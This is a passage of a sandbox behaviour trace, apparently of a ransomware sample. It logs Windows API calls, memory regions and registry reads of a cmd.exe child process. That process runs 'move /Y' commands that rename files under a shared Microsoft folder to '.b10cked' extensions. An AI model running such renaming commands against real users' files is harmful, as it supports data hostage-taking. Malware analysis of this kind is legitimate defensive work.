"c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.192] _wcsicmp (_String1="MSMSAC~2.HXN", _String2=".") returned 63 [0202.192] _wcsicmp (_String1="MSMSAC~2.HXN", _String2="..") returned 63 [0202.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~2.hxn")) returned 0x2022 [0202.192] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", nBufferLength=0x104, lpBuffer=0x1af188, lpFilePart=0x1aef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", lpFilePart=0x1aef20*="MSMSAC~2.HXN") returned 0x27 [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.192] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1af390, lpFilePart=0x1aef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked", lpFilePart=0x1aef20*="MS.MSACCESS.DEV.14.1033.hxn.b10cked") returned 0x3e [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.193] SetLastError (dwErrCode=0x0) [0202.193] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msaccess.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.193] GetLastError () returned 0x2 [0202.193] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae89c) returned 0x310e98 [0202.193] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ae89c | out: lpFindFileData=0x1ae89c) returned 0 [0202.193] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.193] GetLastError () returned 0x12 [0202.193] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae89c) returned 0x310e98 [0202.194] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ae89c | out: lpFindFileData=0x1ae89c) returned 0 [0202.194] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.194] GetLastError () returned 0x12 [0202.194] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0202.194] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0202.194] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.195] GetLastError () returned 0x12 [0202.195] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0202.195] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0202.195] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.195] GetLastError () returned 0x12 [0202.195] _get_osfhandle (_FileHandle=2) returned 0xb [0202.195] GetFileType (hFile=0xb) returned 0x2 [0202.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.578] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1aea6c | out: lpMode=0x1aea6c) returned 1 [0202.578] _get_osfhandle (_FileHandle=2) returned 0xb [0202.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1aeaa0 | out: lpConsoleScreenBufferInfo=0x1aeaa0) returned 1 [0202.578] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.579] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeae0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.579] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1aeac4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeac4*=0x2c) returned 1 [0202.580] longjmp () [0202.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.580] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.580] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.580] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.580] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.580] SetConsoleInputExeNameW () returned 0x1 [0202.580] GetConsoleOutputCP () returned 0x1b5 [0202.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.580] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.580] exit (_Code=1) Process: id = "466" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29246 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29247 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29248 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29249 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29250 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29251 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29252 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29253 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29254 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29255 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30245 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30246 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30247 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30248 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 30249 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 30250 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30251 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30252 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30253 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30254 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30255 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30256 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30257 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30258 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30259 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30260 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30261 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30262 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 30263 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 30264 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30265 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30266 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 30267 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30268 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 30273 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 662 os_tid = 0xcb4 [0204.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf874 | out: lpSystemTimeAsFileTime=0x2cf874*(dwLowDateTime=0xaea802a0, dwHighDateTime=0x1d440a9)) [0204.422] GetCurrentProcessId () returned 0xc2c [0204.422] GetCurrentThreadId () returned 0xcb4 [0204.422] GetTickCount () returned 0x399de [0204.422] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf86c | out: lpPerformanceCount=0x2cf86c*=26121121663) returned 1 [0204.423] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.423] __set_app_type (_Type=0x1) [0204.423] __p__fmode () returned 0x76b331f4 [0204.423] __p__commode () returned 0x76b331fc [0204.423] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.423] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.423] GetCurrentThreadId () returned 0xcb4 [0204.423] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb4) returned 0x38 [0204.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.423] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.423] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.423] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf804 | out: phkResult=0x2cf804*=0x0) returned 0x2 [0204.423] VirtualQuery (in: lpAddress=0x2cf83b, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.423] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.424] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf7d4, dwLength=0x1c | out: lpBuffer=0x2cf7d4*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.424] GetConsoleOutputCP () returned 0x1b5 [0204.424] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.424] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.424] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.424] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.424] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.424] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.425] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.425] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.425] GetEnvironmentStringsW () returned 0x490180* [0204.425] FreeEnvironmentStringsW (penv=0x490180) returned 1 [0204.425] GetEnvironmentStringsW () returned 0x490180* [0204.425] FreeEnvironmentStringsW (penv=0x490180) returned 1 [0204.425] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce774 | out: phkResult=0x2ce774*=0x40) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0xa8, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x0, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegCloseKey (hKey=0x40) returned 0x0 [0204.426] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce774 | out: phkResult=0x2ce774*=0x40) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x40, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x1, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x0, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x4, lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x4) returned 0x0 [0204.426] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce77c, lpData=0x2ce780, lpcbData=0x2ce778*=0x1000 | out: lpType=0x2ce77c*=0x0, lpData=0x2ce780*=0x9, lpcbData=0x2ce778*=0x1000) returned 0x2 [0204.426] RegCloseKey (hKey=0x40) returned 0x0 [0204.426] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.426] srand (_Seed=0x5b8863a6) [0204.426] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" [0204.426] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" [0204.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.427] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.427] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.427] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.427] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.427] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.427] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.427] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.427] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.427] GetEnvironmentStringsW () returned 0x4922d0* [0204.427] FreeEnvironmentStringsW (penv=0x4922d0) returned 1 [0204.427] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.427] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.427] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.427] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.427] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.427] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.427] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.427] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.427] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf540 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf540, lpFilePart=0x2cf53c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf53c*="Desktop") returned 0x18 [0204.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose (in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose (in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf2bc | out: lpFindFileData=0x2cf2bc) returned 0x490010 [0204.428] FindClose (in: hFindFile=0x490010 | out: hFindFile=0x490010) returned 1 [0204.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.428] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.428] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.428] GetEnvironmentStringsW () returned 0x492af0* [0204.429] FreeEnvironmentStringsW (penv=0x492af0) returned 1 [0204.429] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.429] GetConsoleOutputCP () returned 0x1b5 [0204.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.429] GetUserDefaultLCID () returned 0x409 [0204.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf680, cchData=128 | out: lpLCData="0") returned 2 [0204.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf680, 